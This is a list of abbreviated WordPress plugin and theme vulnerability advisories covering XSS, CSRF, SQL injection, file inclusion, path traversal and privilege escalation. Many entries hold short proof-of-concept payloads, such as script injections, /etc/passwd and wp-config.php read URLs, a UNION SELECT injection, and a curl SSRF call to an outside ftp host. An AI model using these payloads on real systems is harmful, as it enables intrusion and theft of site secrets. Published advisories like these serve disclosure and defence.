Mortgage Calculator / Loan Calculator < 1.5.17 - Contributor+ Stored Cross-Site Scripting
The plugin does not escape some of the attributes of its mlcalc shortcode before outputting them, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks. mlcalc schedule="month';alert/XSS///"...
Perfect Survey < 1.5.2 - Unauthenticated Stored Cross-Site Scripting
The plugin does not validate and escape the X-Forwarded-For header value before outputting it in the statistics page when the Anonymize IP setting of a survey is turned off, leading to a Stored Cross-Site Scripting issue. jQuery.postdata: psquestions:1:"1", action:"savequestiondata", ID:"765",...
Pricing Table by Supsystic < 1.8.2 - Unauthenticated Stored XSS
No permission check on the ImportJSONTable endpoint allows malicious JavaScript to be injected by unauthenticated users...
Minimal Coming Soon & Maintenance Mode < 2.15 - CSRF to Stored XSS and Setting Changes
This plugin had no nonce checks on any of its settings to verify that a request came from a legitimate source, such as a logged-in administrative user. This therefore allows a CSRF attack leading to stored XSS, in addition to significant setting changes. alert1" /...
Relevanssi - A Better Search < 4.14.3 - Unauthenticated Stored Cross-Site Scripting
The plugin does not sanitise and escape user searches before outputting them in the related admin dashboard when the feature is enabled. Enable the logging of user queries, then, as an unauthenticated user, request /?s= The XSS will be triggered when an admin views the User Searches dashboard at...
WP Visited Countries Reloaded < 3.1.1 - Reflected Cross-Site Scripting
The plugin does not escape the page parameter in its Countries dashboard before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue alert/XSS/' /...
Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Meta
An attacker could supply an array parameter for sensitive meta data such as the wp_capabilities user meta, which defines a user's role. During the registration process, submitted registration details were passed to the update_profile function, and any respective metadata that was submitted, regardle...
Home Villas <= 2.2 - Multiple Cross-Site Scripting Issues
Unauthenticated Reflected and Authenticated Persistent XSS vulnerabilities were discovered in the Home Villas theme through 2.2 for WordPress. Edit WPScanTeam: July 27th, 2020 - Confirmed and Escalated to Envato; July 28th, 2020 - Envato Investigating; August 17th, 2020 - No updates, disclosing...
Careerfy < 4.1.0 - Multiple Cross-Site Scripting (XSS) Issues
An Unauthenticated Reflected XSS and multiple Authenticated Persistent XSS vulnerabilities were discovered in the Careerfy Job Board theme through 3.9.0 and 4.0.0 for WordPress. Authenticated Persistent XSS on the Candidate and Employer Profile pages. An Authenticated Persistent XSS on the Job Page will...
Contact Form 7 Datepicker <= 2.6.0 - Authenticated Stored Cross-Site Scripting (XSS)
Contact Form 7 Datepicker registers an AJAX action to save settings which calls a function that fails to perform a capability check or nonce check. As such, a logged-in attacker with minimal permissions such as a subscriber can send a crafted request which will store a malicious JavaScript in the...
CarSpot < 2.2.3 - Multiple Vulnerabilities
Multiple vulnerabilities were discovered in the 'CarSpot – Dealership Wordpress Classified Theme', tested version — v2.2.0: - Authenticated Persistent XSS - Registration Form/User Profile; - Authenticated Persistent XSS - Ad Post; - IDOR leading to arbitrary deletion of ads. Edit WPScanTeam: January...
All in One SEO Pack < 3.6.2 - Authenticated Stored Cross-Site Scripting
This flaw allowed authenticated users with contributor level access or above to inject malicious scripts that would be executed if a victim accessed the wp-admin panel's 'All Posts' page. "Exploit Post", "content" => "\nTest2\n", "status" => "pending"; $postdata = json_encode($data); //Get...
Newsletter < 6.7.7 - Authenticated Stored Cross-Site Scripting
An Authenticated Stored Cross-Site Scripting (XSS) was discovered within the Company Info "Motto" field. When creating a new newsletter using an empty template with the header module, the XSS would execute. This was fixed in version 6.7.7...
Master Slider <= 3.7.0 - Authenticated Stored Cross-Site Scripting (XSS)
The plugin does not properly sanitise the slider name when creating or editing a slider, leading to an Authenticated (editor+) Stored Cross-Site Scripting issue which will be triggered in the Slider table at /wp-admin/admin.php?page=master-slider. Edit WPScanTeam: - The original report was from 2018,...
WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
Authenticated Cross-Site Scripting (XSS) in the post/page text editor mode, exploitable by Editor users and above. link...
Ultimate Member < 2.1.12 - Authenticated Privilege Escalation via Profile Update
Because Ultimate Member allowed the creation of new roles, the plugin also made it possible for site administrators to grant secondary Ultimate Member roles to all users upon a /wp-admin profile update. $wpuser, 'pwd' => $wppass, 'rememberme' => 'forever', 'wp-submit' => 'Log+In', ;...
CardGate < 3.1.16 - Unauthorised Payments Hijacking and Order Status Spoofing
Lack of origin authentication (CWE-346) in the IPN callback processing function allows even an unauthorized attacker to remotely replace critical plugin settings (merchant id, secret key, etc.) with values known to them, and therefore bypass the payment process, e.g. spoof the order status by manually sending an IPN callback reques...
EasyBook < 1.2.2 - Multiple Vulnerabilities
Multiple vulnerabilities were discovered in the 'EasyBook – Directory & Listing WordPress Theme', tested version — v1.2.1: - Unauthenticated Reflected XSS; - Authenticated Persistent XSS; - IDOR. December 27th, 2019 - Envato Contacted; January 6th, 2020 - Envato Investigating; January ??th, 2020 -...
JSmol2WP <= 1.07 - Unauthenticated Cross-Site Scripting (XSS)
The jsmol2wp WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability. http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert/xss/%3C/script%3E&mimetype=text/html;%20charset=utf-8...
Flow-Flow Social Stream <= 3.0.71 - Unauthenticated Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) vulnerability in the JSON output, triggered by modifying the hash parameter in admin-ajax.php using the fetchposts action. The response Content-Type is set to HTML. http://www.example.com/wp-admin/admin-ajax.php?action=fetchposts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert1%3E...
Multiple Mediaburst/Clockwork Plugins - Cross-Site Scripting (XSS)
Reflected XSS via the GET parameter "to". Vulnerable Plugins: 1. Clockwork Free and Paid SMS Notifications URL: https://wordpress.org/plugins/mediaburst-email-to-sms/ Version 2.0.3 | By Clockwork 2. Two-Factor Authentication - Clockwork SMS URL:...
NewStatPress <= 1.0.4 - SQL Injection
The Search functionality is susceptible to a SQL Injection attack due to usage of user input without sanitisation, in particular at line 98 of 'includes/nspsearch.php'. Utilising a specially crafted SQL query, we can trigger disclosure of user hashes through an IMG tag as the data channel. The...
White Label CMS <= 1.5.2 - Stored XSS
Due to a lack of CSRF protection and a lack of sanitisation of user input, it is possible to trigger a Persistent XSS attack via a CSRF attack. This attack targets in particular the Import functionality, which is located in the 'wlcmsImport' function, within the file...
SW Ajax WooCommerce Search < 1.2.8 - Unauthenticated Reflected XSS & XFS
Unauthenticated Reflected XSS and XFS vulnerabilities were discovered in the SW Ajax WooCommerce Search plugin v1.2.6 for WordPress. The plugin comes bundled with a number of commercial themes such as OneMall, Revo, eMarket, Autusin, Market, MaxShop, ShoppyStore, Furnicom, EtroStore, HiTheme, StyleShop...
InJob < 3.3.8 - Reflected & Persistent XSS
Multiple XSS vulnerabilities have been found in the 'InJob | Multi-purpose for recruitment WordPress Theme' theme v3.3.6. Edit WPScanTeam: September 16th, 2019 - Envato Contacted; September 16th, 2019 - v3.3.7 released, XSS still present; October 11th, 2019 - Envato contacted again for updates...
Form Maker by 10Web < 1.13.40 - Authenticated Reflected XSS
The 'Form Maker by 10Web' WordPress plugin is vulnerable to XSS in the 'blockedipsfm' page. A logged-in site administrator who follows a crafted link will trigger arbitrary JavaScript code to be run in their browser in the context of their privileged account on the WordPress site...
LearnDash < 3.1.2 - Reflected Cross Site Scripting (XSS) issue on the [ld_profile] search field.
Reflected Cross Site Scripting (XSS) issue on the ld_profile search field. First reported to LearnDash on January 14, 2020; the fix, version 3.1.2, was released the same day. This report is based on an email LearnDash sent out to their users on January 14, 2020. From the Original Researcher Jinson...
iThemes Security <= 7.0.2 - Authenticated SQL Injection
The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection by attackers with Admin privileges via the logs page. Vulnerability description: iThemes Security appears to be vulnerable to time-based SQL Injection. The orderby parameter is vulnerable because the backend...
Multiple BestWebSoft Plugins - Authenticated Cross-Site Scripting (XSS)
http://www.example.com/wp-admin/admin.php?page=bwspanel&category=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%2842%29%3C%2Fscript%3E...
Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
The plugin is still affected and has been closed. http://example.com/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd...
Coming Soon Page, Under Construction & Maintenance Mode by SeedProd < 5.1.2 - Authenticated Stored Cross Site Scripting (XSS)
Authenticated stored cross-site scripting issues in some of the plugin settings, requiring high privileges. The affected fields are in the plugin's settings, and the payload is triggered when the coming soon page is displayed, either in preview or normally: Logo: x' onerror='alert/XSS/ Headlines:...
Page Builder: PageLayer - Drag and Drop website builder < 1.1.2 - CSRF leading to XSS
A flaw allowed attackers to forge a request on behalf of a site's administrator to modify the plugin's settings, which could allow malicious JavaScript injection...
wpCentral < 1.4.8 - Privilege Escalation
There’s a vulnerability that allows anyone who is logged in with any user role to escalate their privilege, or alter/upload any file, or adjust any plugin and interact with the site in many other ways. In wpcentral.php, AJAX actions are registered. However, it's only checking whether or not the...
Advanced Access Manager < 5.9.9 - Arbitrary File Access/Download
Advanced Access Manager before Version 5.9.9 allows reading arbitrary files without checking whether a user is allowed to read the given file. This way one can download the wp-config.php file and get access to the database, which is publicly reachable on many servers...
W3 Total Cache <= 0.9.7.3 - Blind SSRF and RCE via phar
The implementation of opcacheflushfile calls file_exists with a parameter fully controlled by the user. curl 'http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php' --data 'nonce=974ca6ad15021a6668e7ae02e1be551c&command=flushfile&file=ftp://y.y.y.y:zzzz/' Note: The nonce value is given ...
NewStatPress <= 1.0.4 - Reflected Cross-Site Scripting (XSS)
The NewStatPress plugin uses, on lines 28 and 31 of the file 'includes/nspsearch.php', several variables from the $_GET scope without sanitisation. While WordPress automatically escapes quotes in this scope, the outputs on these lines are outside of quotes, and as such can be used to trigger ...
WordPress 3.0-3.9.2 - Unauthenticated Stored Cross-Site Scripting (XSS)
" onmouseover="alert'hello';"...
WPJobBoard < 5.7.0 - Unauthenticated Reflected XSS & XFS
Unauthenticated Reflected XSS & XFS vulnerabilities were discovered in the WPJobBoard plugin v5.6.4 for WordPress. Vulnerable parameters: query, location. Payloads: " " PoC Unauthenticated Reflected XSS:...
Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
The lack of authorisation checks in the handle_downloads function, hooked to admin_init, could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload. /wp-admin/admin-post.php?algwcpifdownloadfile=../../../../../wp-config.php...
SRS Simple Hits Counter <= 1.0.4 - Unauthenticated Blind SQL Injection
Alex Peña from Tenable discovered a blind SQL injection which could allow unauthenticated remote attackers to retrieve data from the DBMS. Note: The vendor attempted a fix in v1.0.4, which is incomplete. The PoC will be displayed once the issue has been remediated...
Easy Testimonials < 3.6 - Authenticated Stored Cross-Site Scripting (XSS)
Multiple cross-site scripting vulnerabilities in Easy Testimonials 3.5.2 and lower allow remote attackers to inject arbitrary web script or HTML via the Client Name, Position / Web Address / Other, Location Reviewed / Product Reviewed / Item Reviewed, and Rating parameters. Successful exploitation of...
Tutor LMS < 1.5.3 - Cross-Site Request Forgery (CSRF)
The Tutor LMS WordPress plugin is vulnerable to Cross-Site Request Forgery (CSRF) attacks. As the requests for the approval and blocking of instructors are sent using the GET method, a CSRF attack to approve an attacker-controlled instructor account can be performed by having the admin visit...
Server Status by Hostname/IP <= 4.6 - Authenticated SQL Injection
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-admin/admin.php?page=all-servers&id=2+UNION+SELECT+1%2C2%2C3%2C%40%40version+&action=edit...
Ultimate Membership Pro <= 7.5 - Arbitrary media upload
The ajax-upload.php endpoint doesn't check for the current user's capabilities or that they are even logged in, so we can do a few things we shouldn't be able to do: Without any credentials, you can simply POST the image file in the field ihcfile and it'll store it for you: $ curl -F...
Delightful Downloads <= 1.6.6 - Unauthenticated Path Traversal
Since no authentication or authorisation checks are made for direct access to jqueryFileTree.php, the vulnerability allows browsing the file system of the host from an unauthenticated context. Even though no file content can be exfiltrated this way, "hidden" files e.g. in the web...
WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
http://www.example.com/wp-admin/customize.php?theme= source: https://twitter.com/brutelogic/status/685105483397619713...
Elementor < 2.9.14 - Authenticated Stored Cross-Site Scripting
The template name is not properly sanitised when output back, leading to a stored XSS issue. Go to the Templates tab, click on "Add New", and select Page or Section. Then add an XSS payload such as " in the "Name your template" field and hit Create Template...
Testimonial Rotator < 3.0.3 - Authenticated Stored Cross-Site Scripting (XSS)
A Stored XSS vulnerability has been found in the 'Author Information' textarea of the plugin's testimonials, which could allow an authenticated medium-privileged user (contributor+) to inject arbitrary JavaScript. The XSS will be triggered for anyone visiting public posts or the testimonial page...
Advanced Order Export For WooCommerce < 3.1.4 - Authenticated Cross-Site Scripting (XSS)
The Advanced Order Export plugin for WooCommerce, versions before 3.1.4, had a reflected XSS vulnerability due to lack of input sanitisation on the woeposttype parameter. This allowed arbitrary HTML and JavaScript injection and execution in the context of the logged-in user. On a WooCommerce installation...
Smart Marketing SMS and Newsletters Forms <= 1.1.1 - Unauthenticated Cross-Site Scripting (XSS)
The Smart Marketing SMS and Newsletters Forms WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability. POST /wordpress/wp-content/plugins/smart-marketing-for-wp/admin/partials/custom/egoi-for-wp-formegoi.php HTTP/1.1 Host: 127.0.0.1 Content-Type:...